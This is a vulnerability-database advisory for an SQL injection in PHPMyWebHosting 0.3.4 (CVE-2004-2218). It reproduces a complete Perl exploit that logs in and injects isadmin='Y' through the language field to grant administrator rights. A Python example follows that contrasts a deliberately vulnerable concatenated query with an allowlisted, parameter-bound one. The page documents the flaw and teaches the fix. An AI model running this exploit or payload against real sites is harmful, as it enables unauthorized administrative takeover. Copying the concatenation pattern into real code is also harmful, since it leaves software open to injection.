PHPMyWebHosting SQL Injection Vulnerability

Vulnerability ID: 1108126    Vulnerability type: SQL injection
Published: 2004-08-20    Updated: 2005-10-20
CVE ID: CVE-2004-2218
CNNVD-ID: CNNVD-200412-797
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/406
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-797
|Vulnerability details
pmwh.php in PHPMyWebHosting 0.3.4 and earlier contains an SQL injection vulnerability. A remote attacker can modify SQL statements via the password parameter.
|Exploit
#!/usr/bin/perl
# Exploit code by Noam Rathaus of Beyond Security Ltd.
# The following exploit code will use a valid username and password
# combination, to cause an SQL injection.
# Using the SQL injection, the Perl script elevates the privileges of the
# user provided to administrative.

use IO::Socket;
use strict;

my $Host = shift;
my $Path = shift;
my $Username = shift;
my $Password = shift;

if ($Host eq "" || $Path eq "" || $Username eq "" || $Password eq "")
{
print "You must run the script with the following syntax:\n";
print $0." hostname path username password\n";
exit(0);
}

my $remote = IO::Socket::INET->new (  Proto => "tcp", PeerAddr => $Host,
PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $Host" }

print "connected\n";

$remote->autoflush(1);

my $http = "POST /$Path/index.php HTTP/1.1
Host: $Host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040506 Firefox/0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

# The language field carries the injected column assignment.
my $content =
"PHP_AUTH_USER=$Username&password=$Password&language=english',isadmin='Y&login=Login";

$http .= length($content)."

$content";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
print "Sent\n";

# Print the server's response.
while (<$remote>)
{
print $_;
}
print "\n";

close $remote;


# milw0rm.com [2004-08-20]
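
The `language` value in the request above closes the quoted string and appends a second column assignment. The following Python model is an added example, not PHPMyWebHosting's code: the table layout, the UPDATE statement and the allowlist are assumptions, and SQLite stands in for the application's database. It shows why a concatenated query lets that value set `isadmin`, and how an allowlist plus a bound parameter prevents it.

```python
import sqlite3

# Constructed schema: the table name and layout are assumptions; only the
# `language` and `isadmin` names come from the request shown on the page.
SCHEMA = """
CREATE TABLE users (
    username TEXT PRIMARY KEY,
    language TEXT NOT NULL DEFAULT 'english',
    isadmin  TEXT NOT NULL DEFAULT 'N'
);
INSERT INTO users (username) VALUES ('alice');
"""
ALLOWED_LANGUAGES = {"english", "german", "french"}  # hypothetical allowlist


def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def set_language_concat(db, username, language):
    """Vulnerable pattern: request data is pasted into the SQL text."""
    db.execute(
        "UPDATE users SET language='" + language + "' "
        "WHERE username='" + username + "'"
    )


def set_language_bound(db, username, language):
    """Hardened pattern: allowlist the value, then bind it as a parameter."""
    if language not in ALLOWED_LANGUAGES:
        raise ValueError("unsupported language")
    db.execute("UPDATE users SET language=? WHERE username=?", (language, username))


def is_admin(db, username):
    row = db.execute("SELECT isadmin FROM users WHERE username=?", (username,)).fetchone()
    return row[0] == "Y"


if __name__ == "__main__":
    db = new_db()
    set_language_concat(db, "alice", "english',isadmin='Y")  # value from the page
    print("concatenated query -> admin:", is_admin(db, "alice"))
```
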
|References

Source: XF
Name: phpmywebhosting-pmwh-sql-injection(17005)
Link: http://xforce.iss.net/xforce/xfdb/17005
Source: BID
Name: 10942
Link: http://www.securityfocus.com/bid/10942
Source: BUGTRAQ
Name: 20040920 Re: Posible security bug in phpMyWebhosting
Link: http://archives.neohapsis.com/archives/bugtraq/2004-09/0247.html
Source: OSVDB
Name: 8976
Link: http://www.osvdb.org/8976
Source: BUGTRAQ
Name: 20040814 Posible security bug in phpMyWebhosting
Link: http://archives.neohapsis.com/archives/bugtraq/2004-08/0207.html
